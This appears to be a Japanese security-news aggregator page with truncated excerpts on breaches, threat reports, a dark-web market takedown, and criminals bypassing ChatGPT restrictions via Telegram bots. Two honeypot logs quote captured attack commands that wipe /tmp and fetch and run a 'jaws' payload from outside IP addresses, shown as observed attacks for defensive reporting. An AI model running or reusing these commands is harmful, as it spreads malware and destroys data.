NHN テコラス、サーバー・ネットワーク脆弱性管理に有効なASMサービス「Criminal IP ASM」の取り扱いを開始世界中の脅威情報をもとにIT資産のリスクに対してAIを活用して分析し、可視化・評価を行うSaaS型セキュリティソリューション NHN テコラス株式会社(本社:東京都港区、代表取締役社長:白倉 章照、以下NHN テコラス)は、AIを活用したセキュリティ専門企業であるAI Spera Inc.と日本国内のおけるディストリビューター契約を結び、世界中のIPアドレスに関連する脅威情報をもとに、運用中のIT資産情報を自動的に収集し、システムの危険などを可視化・評価することができるASM(Attack Surface Management: 攻撃対象領域管理) サービス「Criminal IP ASM」をクラウド総合支援サービス「C-Chorus」のマネージドサービスのラインアップ
アクセンチュアが世界のテクノロジートレンドに関する最新の調査レポート「Accenture Technology Vision 2023(以下、テクノロジービジョン2023)」を発表。 発表された「テクノロジービジョン2023」では、現実空間とデジタル空間が密接につながり合っていく中、ジェネレーティブAIをはじめとした先進的なテクノロジーがビジネスの新時代を切り開きつつあることを明らかにしている。 現実とデジタルの融合を促すテクノロジーのトレンドを定義 アクセンチュアは2022年12月から2023年1月の間に調査を実施。今回の調査にあたり、研究機関、ベンチャーキャピタル、ベンチャー企業に在籍する25名以上の有識者で構成される外部諮問委員会から知見を収集。同時に、アクセンチュア・リサーチは、日本を含む世界34カ国、25の業界にわたる4,777人の上級役職者や役員を対象に調査を行った。 今回のレ
ハニーポット(仮) 観測記録 2023/04/01分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 /.envへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス aiohttpによるスキャン行為 okhttpによるスキャン行為 zgrabによるスキャン行為 .cssへのスキャン行為 .jsへのスキャン行為 /.gitへのスキャン行為 phpMyAdminへのスキャン行為 5.188.210.227に関する不正通信 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 45.81.243.34/jaws; sh /tmp/jaws Location:US Apache HTTP Ser
2023年3月30日、名刺管理サービスを提供するSansanは、同社になりすました不審な電話やメールが確認されているとして利用組織に対して注意を呼びかけました。その後、この注意喚起に関連して実際に被害に遭ったとみられる企業が名刺管理システムからの情報流出の公表を行っています。ここでは関連する情報をまとめます。 運営会社になりすました人物から電話後にフィッシングメール 不正アクセス被害を公表したのは川崎設備工業。名刺管理システム上に登録された名刺情報6万6214件が流出した。名刺情報には氏名、会社名、役職、会社住所、電話番号、メールアドレス等が含まれていたが、公表時点では流出した情報の悪用(営業メールや電話等の発生)は確認されていない。 不正アクセスは2月13日の同社従業員への電話連絡から始まった。電話をかけてきた人物は、Sansanの従業員になりすまし、川崎設備工業からその従業員に対して2
クラウドストライクは2023年3月29日、年次レポートの最新版である「2023年版グローバル脅威レポート」(以下、脅威レポート)を発表した。これは同社のEDRソリューション「CrowdStrike Falcon」から収集したインシデント関連データや、スレットハンティングから得られた情報を基に攻撃者の動向を分析したもので、クラウドサービスを狙った脅威や脆弱(ぜいじゃく)性の再利用など、幾つかの興味深い傾向が見られた。 防御側を不利にする4つの傾向が浮上 クラウドストライクの鵜沢裕一氏(プリンシパルコンサルタント)は発表会の冒頭で「セキュリティ対策チームが4つの課題に直面している」と指摘した。 1つ目は「ブレークアウトタイム」が2021年の98分から2022年には84分へと短縮していることだ。ブレークアウトタイムはサイバー攻撃者が最初に侵入してからシステム内の別のホストに横展開(ラテラルムーブ
脅威情報 2023.4.6 Steen Pedersen、Mo Cashman両氏の協力に感謝します。 4月4日と5日、FBI、ユーロポール、オランダ警察を含む17カ国の機関にまたがる法執行タスクフォースが、ジェネシス・マーケット(Genesis Market)として知られる悪名高いブラウザ Cookie 市場を混乱させ、何百人ものユーザーにアプローチしました。収集された情報に基づいて家宅捜索が行われ、ユーザーは逮捕されるか、深刻なノック&トークの会話を求められました。 この世界的な行動は、この種の最大の市場に終止符を打つことを目的としたものです。今朝(4月5日の朝)の時点で、ジェネシス・マーケットのWebアドレスには、以前のケースで見たようにおなじみのテイクダウン スプラッシュスクリーンが表示されています。 図1 テイクダウン通知の画面イメージ 世界的なテイクダウンの取り組みに先立ち、T
AIが私たちの今後の生活に多大な影響をもたらすのは間違いありません。その変化に対してどう備えるべきなのでしょうか。 2022年には、この年を特徴づけるようなさまざまな地政学上の出来事がありましたが、テクノロジーの分野において、まさに「AIの年」となりました。まず正直に申しますが、私はかなり最近まで、サイバーセキュリティにおけるAIについて聞かれても、実用の段階にないベイパーウェアとして見ていました。機械学習がさまざまな現実的用途に応用されていることは知っていましたが、情報セキュリティの業界では、AIは製品の売り込みにしか使われていませんでした。私にしてみれば、「AI搭載」というのは「既存の知識基盤やテレメトリがないので、代わりにヒューリスティックを考案しました」ということをベンダーなりに納得いくよう説明したに過ぎないものでした。私は今でも、実際の製品に本物のAIはほとんど搭載されていないケ
情報収集の優先順位が北朝鮮偵察総局(RGB)の任務と一致している 暗号通貨を窃取し、マネーロンダリングによって自ら活動の資金としており、支援国中央政府の財政的負担をかけることなく活動している 韓国や日本、欧州、米国を中心とした地域が標的とされている。政治やビジネスサービス、製造業、地政学や核政策を扱う教育機関、研究機関、シンクタンクなどが狙われている 2021年の大半にわたっては医療関連の業界が標的とされた。恐らく新型コロナウイルス感染症(COVIDー19)対応を支援するために標的がシフトしたものとみられる 巧妙なソーシャルエンジニアリングを駆使している。個人識別情報(PII)を窃取してアカウントを作成したりドメイン登録をしたりしている他、運用ツールやインフラを購入するためのIDも入手している 窃取した暗号通貨を使ってクリーンな暗号想通貨をマイニングし、資金として利用している 長期にわたっ
二要素認証さえしておけば安全……ではない さまざまなネットサービスやSNSを利用するにあたり、アカウントを保護することはきわめて重要になってくる。ここ数年、複雑で強力なパスワードが求められるだけではなく、「二要素認証」が推奨されることも多い。 二要素認証は、パスワードとSMSで送られてくるコード、パスワードと指紋認証など、異なる認証要素の2つを組み合わせるセキュリティだ。多くのネットサービスで利用可能になっており、サービスやアプリ側から設定を促されることも多いだろう。 “認証要素”は、大きく分けて3つある。IDやパスワード、秘密の質問などの「知識要素」。スマートフォンを使ったSMS認証やアプリ認証など、その人が所有しているものに付随する情報の「所有要素」。顔認識や指紋、虹彩(目の膜)など、身体的な情報の「生体要素」だ。 よって、2つの要素を使った本人認証は「二要素認証」となる。 対して、認
企業やウェブサイトから盗み出された個人情報の売買に用いられることで知られるサイバー犯罪フォーラム「BreachForums」の管理人で、ニューヨーク州在住の男をFBIが逮捕・起訴しました。男は「Pompompurin(ポムポムプリン)」のハンドルネームを使い、個人情報の売買を行っていました。 Dark Web ‘BreachForums’ Operator Charged With Computer Crime - Bloomberg https://www.bloomberg.com/news/articles/2023-03-17/dark-web-breachforums-operator-charged-with-computer-crime Alleged BreachForums owner Pompompurin arrested on cybercrime charges
印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます ウィズセキュアは、同社が観測した中国のサイバー犯罪者からロシアのランサムウェアギャングへのサイバー攻撃ツール「SILKLOADER」の提供に関するレポートを発表した。 SILKLOADERはローダー(Loader)と呼ばれるマルウェアの一種で、「VLC Media Player」を使用したDLLサイドローディングと呼ばれる手法を悪用し、デバイス上で「Cobalt Strike」のビーコンを起動させる。これらのビーコンは、攻撃者が感染したデバイスに継続的にアクセスし、さらに使用し続けることに利用される。なお同ツールはCobalt Strikeビーコンを見えなくして、被害者のマシンの防御対策を回避するよう設計されている。 レポートによると、
アメリカのネット詐欺、最もよく使われている手口ランキング2023.03.16 23:006,038 Nikki Main - Gizmodo US [原文] ( 岩田リョウコ ) 日本でも同じ。みなさん、気をつけましょう。 ネット詐欺は日本でもアメリカで世界中どこでも横行している犯罪です。特にアメリカは数十億ドルもの損害が出ています。 FBIが発表した最新のサイバー犯罪報告書によると、ランサムウェア、詐欺電話・メッセージ・メールなどがうなぎ上りに増えていて、去年だけで100億ドル(約1兆3590億円)の損害があったとのこと。 こういった詐欺は、年齢問わず被害に遭ってしまうものですが、特に60歳以上の被害が最多で、その被害総額はなんと7億2400万ドル!(約965億円)。 2021年に比べると2022年の被害報告は5%減ったそうですが、被害の総額は逆に40億ドル以上もアップしています。被害の
サイバー犯罪の世界においては、脅威アクター同士が持っている技術を互いに共有することがあり、それにより攻撃の件数が増加し、その精度が高くなってきています。ウィズセキュアは同社が観測した中国のサイバー犯罪者からロシアのランサムウェアギャングへのサイバー攻撃ツール『SILKLOADER』の提供に関するレポートを発行し、サイバー犯罪集団間でのツール共有のダイナミズムについて説明しています。 サイバー犯罪の世界においては、脅威アクター同士が持っている技術を互いに共有することがあり、それにより攻撃の件数が増加し、その精度が高くなってきています。先進的サイバーセキュリティテクノロジーのプロバイダーであるWithSecure (旧社名: F-Secure、本社: フィンランド・ヘルシンキ、CEO: Juhani Hintikka、日本法人: 東京都港区、以下、ウィズセキュア) は同社が観測した中国のサイバ
チェック・ポイント・リサーチ、サイバー犯罪者がテレグラムボットを使用することでChatGPTの制限を回避し、悪意あるメールやコードを作成していることを確認 包括的なサイバーセキュリティソリューションプロバイダーであるチェック・ポイント・ソフトウェア・テクノロジーズ(Check Point Software Technologies Ltd.、NASDAQ: CHKP、以下チェック・ポイント)の脅威インテリジェンス部門であるチェック・ポイント・リサーチ(Check Point Research、以下CPR)は、サイバー犯罪者らがアンダーグラウンドのハッキングフォーラム内で、テレグラムボット(Telegram Bot)を使い、ChatGPTの制限を回避し、悪意あるメールやコードの生成を可能にしていることを確認しました。テレグラムボットとは、チャットアプリ「テレグラム」内のグループや個人のチャッ
man-on-the-side攻撃(MOTS攻撃)とは何か、man-in-the-middle攻撃(MITM攻撃、中間者攻撃)とどう違うのかについて説明します。 サイバー攻撃には、誰でも聞いたことがあるような、たとえばDDoS(分散型サービス妨害)攻撃のようなものもあれば、ほとんど専門家しか知らないようなman-in-the-middle(MitM、中間者)攻撃のようなものもあります。そして、さらに珍しい攻撃として、man-on-the-side(MotS)攻撃があります。今回の記事では、man-on-the-side攻撃とは何か、そしてman-in-the-middle攻撃との違いについて説明します。 誰がどこから攻撃するのか man-on-the-side攻撃とは、標的デバイスからの通信リクエストを見つけ出し、正規のサーバーよりも先にその標的デバイスへ応答を試みるものです。基本的には、
2023年3月8日 株式会社Doctor Web Pacific Android向け Dr.Webアンチウイルス製品によって収集された検出統計によると、2023年1月にはアドウェア型トロイの木馬が最も多く検出された脅威となりました。中でも最も広く拡散されたのが Android.HiddenAds ファミリーに属するトロイの木馬で、その検出数は2022年12月と比べて18.04%増加しています。 バンキング型トロイの木馬と暗号化ランサムウェアの活動も前月と比較して増加し、それぞれ2.63%増、20.71%増となっています。一方、スパイウェアの活動にはわずかな減少がみられました。 Google Playでは、Doctor Webのウイルスラボによって新たな脅威が多数発見されています。それらの中には、偽アプリや、ユーザーを有料サービスに登録するトロイの木馬が含まれていました。 1月の主な傾向 ア
ドリームニュース> プレスリリース一覧> ソフォス株式会社> ソフォス、アップル社のApp Storeで発見された、サイバー犯罪者がCryptoRomスキームに使用する初の偽アプリの詳細を発表 2023年3月9日 <<報道資料>> ソフォス株式会社 ソフォス、アップル社のApp Storeで発見された、サイバー犯罪者がCryptoRomスキームに使用する初の偽アプリの詳細を発表 ~ソフォスが公開した最新のレポートで、Apple App Store のアプリ審査をくぐり抜けた方法など、CryptoRom 詐欺の最新情報を解説~ Cybersecurity-as-a-Serviceを開発・提供するグローバルリーダー企業のソフォス(日本法人:ソフォス株式会社(東京都港区 代表取締役 中西 智行)は本日、CryptoRom詐欺について新たに判明した情報を公開しました。ソフォスは、出会い系アプリのユ
ユーザーは多くのアカウント管理を強いられている一方で、アカウント情報の流出は頻繁に起こっている。もはやIDやパスワードは流出するものとして考えて、セキュリティに取り組む必要がある。不正アクセスなどのセキュリティ問題からユーザーを守るため、二要素認証は欠かすことができないのが現状である。しかし二要素認証にはさまざまな方法があり、サービス提供者が導入するにはそれぞれの方法の利点や欠点などを把握することが重要である。APIで二要素認証を提供しているTwilio Japan合同会社の池原大然氏は、複数の二要素認証手法の比較と認証システムについて語った。 本レポートは、2023年2月9日に行われた講演をもとにしたものです。 個人アカウントを守る、セキュリティを高める二要素認証の必要性 Twilio Japanは、SNSや電話、チャット、ビデオ、Eメールといった、さまざまなコミュニケーションチャネルを
カジュアルファッションを取り扱う株式会社アダストリアは3月31日、1月19日に公表した同社サーバへの不正アクセスについて調査結果を発表した。 同社では1月18日に、同社が管理運用する一部の社内業務システムのサーバー等に対し第三者からの不正アクセスを確認、同社では被害拡大防止のためにネットワークの遮断等の対応を実施するとともに、外部の専門機関と連携し原因や経路の究明、流出の可能性がある情報について調査を進めていた。
ハニーポット(仮) 観測記録 2023/03/31分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス curlによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 103.215.81.11/jaws; chmod /tmp/jaws; sh /tmp/jaws cd /tmp;
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く